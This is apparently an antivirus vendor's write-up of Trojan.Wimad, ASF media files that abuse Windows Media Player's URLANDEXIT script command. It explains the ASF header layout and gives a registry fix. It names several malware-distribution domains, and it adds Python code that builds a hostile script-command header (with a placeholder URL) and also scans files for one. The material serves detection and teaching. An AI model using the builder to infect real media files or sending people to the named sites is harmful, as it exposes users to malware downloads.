
Trojan.Wimad.Gen.1

Damage: MEDIUM
Spreading: MEDIUM
Size: varies
Aliases: WMA/TrojanDownloader.GetCodec.gen trojan, EXP/ASF.GetCodec.Gen, WMA:Wimad, Trojan-Downloader.WMA.GetCodec, Trojan.Wimad

Symptoms

When an ASF file is played, a browser window opens to a specific website that downloads a piece of malicious software. The media file itself carries no executable code; it only carries a script command that makes the player open the URL.

Here is a screenshot of this behavior in Windows Media Player:


Removal instructions:

Set the following registry value to 0 (it lives under HKEY_CURRENT_USER, so it must be set for every user profile on the machine):
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\URLAndExitCommandsEnabled = 0
Then let BitDefender disinfect your files.

Analyzed By

Daniel Chipiristeanu, virus researcher

Technical Description:

First let's look at what an ASF is, according to Microsoft: "Advanced Systems Format (ASF) is an extensible file format designed to store coordinated digital media data. It supports data delivery over a wide variety of networks and is also suitable for local playback." You can see the full format specification from the vendor here: http://www.microsoft.com/windows/windowsmedia/forpros/format/asfspec.aspx

Put briefly, ASF is a container that stores data in different encodings, most commonly Windows Media Audio (.WMA) and Windows Media Video (.WMV).

Before defining the detection, let's look at the ASF file format, describing only the path through the headers to the vulnerable script-command function.

It is divided into three parts (objects):
1. Header Object, which may contain, in no particular order, these other ASF objects:
  1. File Properties Object. Contains global file attributes.
  2. Stream Properties Object. Defines a digital media stream and its characteristics.
  3. Header Extension Object. Allows additional functionality to be added to an ASF file while maintaining backward compatibility.
  4. Content Description Object. Contains bibliographic information.
  5. Script Command Object. Contains commands that can be executed on the playback timeline.

2. Data Object, which contains the digital media data stored in ASF Data Packets of fixed length, sorted in order of appearance.
3. Index Objects (optional).

ASF uses GUIDs (Globally Unique Identifiers) to mark the start of each object. Every object begins with its 128-bit GUID followed by a 64-bit Object Size that covers the whole object including that GUID, so a parser walks the file by jumping from one size field to the next. Note that GUIDs are stored with their first three fields little-endian: the Header Object GUID below appears on disk as the bytes 30 26 B2 75 8E 66 CF 11 A6 D9 00 AA 00 62 CE 6C.

The Header Object has this GUID -> 75B22630-668E-11CF-A6D9-00AA0062CE6C and looks like this:

Field name                  Field type   Size (bits)
Object ID                   GUID         128
Object Size                 QWORD        64
Number of Header Objects    DWORD        32
Reserved1                   BYTE         8
Reserved2                   BYTE         8

The Header Object can contain a Script Command Object (GUID -> 1EFB1A30-0B62-11D0-A39B-00A0C90348F6):

Field name            Field type   Size (bits)
Object ID             GUID         128
Object Size           QWORD        64
Reserved              GUID         128
Commands Count        WORD         16
Command Types Count   WORD         16
Command Types         See below    varies
Commands              See below    varies

The Command Types Count field gives the number of Command Type entries that follow; likewise Commands Count gives the number of Command entries.

Command Type structure:

Field name                  Field type   Size (bits)
Command Type Name Length    WORD         16
Command Type Name           WCHAR        varies

Command structure:

Field name             Field type   Size (bits)
Presentation Time      DWORD        32
Type Index             WORD         16
Command Name Length    WORD         16
Command Name           WCHAR        varies

The Command Type Name Length field specifies the number of Unicode characters (WCHARs, not bytes) found within the Command Type Name field, so the field occupies twice that many bytes. The same goes for Command Name Length and Command Name. Type Index selects one of the Command Type entries, and Presentation Time is the point on the playback timeline, in milliseconds, at which the player executes the command.

The abused feature is the URLANDEXIT command type: when Windows Media Player reaches a command of this type on the timeline, it opens the URL given in the Command Name field in a browser window, and the malicious files point that URL at a malware-distribution website.
There are numerous examples of such websites: isvbr.net, fastmp3player.com, missing-codecs.net, seonomad.com. For the malicious files served from them we have detections such as Trojan.Downloader.JLKD, Trojan.Downloader.JKNX, Adware.PlayMP3z etc.

You can disable this kind of behavior by setting the following registry value: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\URLAndExitCommandsEnabled = 0
As the layout above shows, it is rather simple to write a program that "infects" ASF files by inserting a Script Command Object into the Header Object, giving otherwise legitimate media data an unwanted behavior.
One such example is Trojan.Downloader.GetCodec.B.
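As an added example (not Bitdefender's or Microsoft's code), the following Python builds a constructed ASF Header Object carrying a Script Command Object with a URLANDEXIT command, which is exactly what an "infector" such as the one described above writes into a file, and then walks the header along the fields laid out above to report any URL commands, which is the check a scanner performs. The URL is a placeholder, the Reserved GUID value is the fixed value from the ASF specification as I recall it (the parser skips that field without validating it), and every size field is bounds-checked before use, since a hostile file controls them.

```python
"""Build and scan ASF headers for script commands (added example, not
Bitdefender's or Microsoft's code). The sample header is constructed in
memory so this runs offline; the URL in it is a placeholder."""
import struct
import uuid

# GUIDs from the page; .bytes_le gives the mixed-endian on-disk byte order.
ASF_HEADER_OBJECT = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C")
ASF_SCRIPT_COMMAND_OBJECT = uuid.UUID("1EFB1A30-0B62-11D0-A39B-00A0C90348F6")
# Assumption: the fixed Reserved GUID of the Script Command Object per the
# ASF spec; the parser below skips the field without checking it.
SCRIPT_COMMAND_RESERVED = uuid.UUID("4B1ACBE3-100B-11D0-A39B-00A0C90348F6")
# Command types the player acts on by opening the Command Name as a URL.
DANGEROUS_TYPES = {"URLANDEXIT"}


def _wstr(text):
    """WORD length in UTF-16 code units (not bytes), then the UTF-16LE text."""
    data = text.encode("utf-16-le")
    return struct.pack("<H", len(data) // 2) + data


def build_script_command_object(types, commands):
    """commands: list of (presentation_time_ms, type_index, command_name)."""
    body = SCRIPT_COMMAND_RESERVED.bytes_le
    body += struct.pack("<HH", len(commands), len(types))
    for name in types:
        body += _wstr(name)
    for time_ms, type_index, name in commands:
        body += struct.pack("<IH", time_ms, type_index) + _wstr(name)
    # Object Size covers the whole object: GUID (16) + size field (8) + body.
    return ASF_SCRIPT_COMMAND_OBJECT.bytes_le + struct.pack("<Q", 24 + len(body)) + body


def build_header_object(sub_objects):
    """Header Object: GUID, size, count, Reserved1=0x01, Reserved2=0x02, sub-objects."""
    payload = b"".join(sub_objects)
    return (ASF_HEADER_OBJECT.bytes_le
            + struct.pack("<QIBB", 30 + len(payload), len(sub_objects), 1, 2)
            + payload)


def _read_wstr(buf, off):
    """Read a length-prefixed WCHAR string; returns (text, next_offset)."""
    (n,) = struct.unpack_from("<H", buf, off)
    raw = buf[off + 2:off + 2 + 2 * n]
    if len(raw) != 2 * n:
        raise ValueError("truncated Unicode string")
    return raw.decode("utf-16-le"), off + 2 + 2 * n


def parse_script_commands(obj):
    """Return [(time_ms, type_name, command_name)] for one Script Command Object."""
    off = 16 + 8 + 16  # Object ID, Object Size, Reserved GUID
    count, ntypes = struct.unpack_from("<HH", obj, off)
    off += 4
    types = []
    for _ in range(ntypes):
        name, off = _read_wstr(obj, off)
        types.append(name)
    commands = []
    for _ in range(count):
        time_ms, idx = struct.unpack_from("<IH", obj, off)
        name, off = _read_wstr(obj, off + 6)
        if idx >= len(types):
            raise ValueError("Type Index %d out of range" % idx)
        commands.append((time_ms, types[idx], name))
    return commands


def scan_asf_header(data):
    """Walk the Header Object's sub-objects; return the URL-type commands found."""
    if data[:16] != ASF_HEADER_OBJECT.bytes_le:
        raise ValueError("not an ASF Header Object")
    header_size, count = struct.unpack_from("<QI", data, 16)
    end = min(header_size, len(data))
    off, findings = 30, []
    for _ in range(count):
        if off + 24 > end:
            raise ValueError("truncated sub-object")
        guid = data[off:off + 16]
        (size,) = struct.unpack_from("<Q", data, off + 16)
        if size < 24 or off + size > end:  # never trust a size field
            raise ValueError("bad sub-object size %d" % size)
        if guid == ASF_SCRIPT_COMMAND_OBJECT.bytes_le:
            for time_ms, tname, cmd in parse_script_commands(data[off:off + size]):
                if tname.upper() in DANGEROUS_TYPES:
                    findings.append((time_ms, tname, cmd))
        off += size
    return findings


def constructed_sample():
    """Constructed hostile header: URLANDEXIT at t=0 pointing at a placeholder site."""
    sco = build_script_command_object(
        ["URLANDEXIT", "FILENAME"],
        [(0, 0, "http://codec-download.example.invalid/get.php"), (5000, 1, "next.wma")])
    return build_header_object([sco])


if __name__ == "__main__":
    for time_ms, tname, cmd in scan_asf_header(constructed_sample()):
        print("%d ms  %s -> %s" % (time_ms, tname, cmd))
```

Run as a script it reports the URLANDEXIT command at 0 ms and ignores the FILENAME command, which only names the next file to play. To scan a real file, read its first Header Object (the file starts with the Header Object GUID) and pass those bytes to scan_asf_header; the size checks make a truncated or oversized Object Size field raise instead of reading past the buffer.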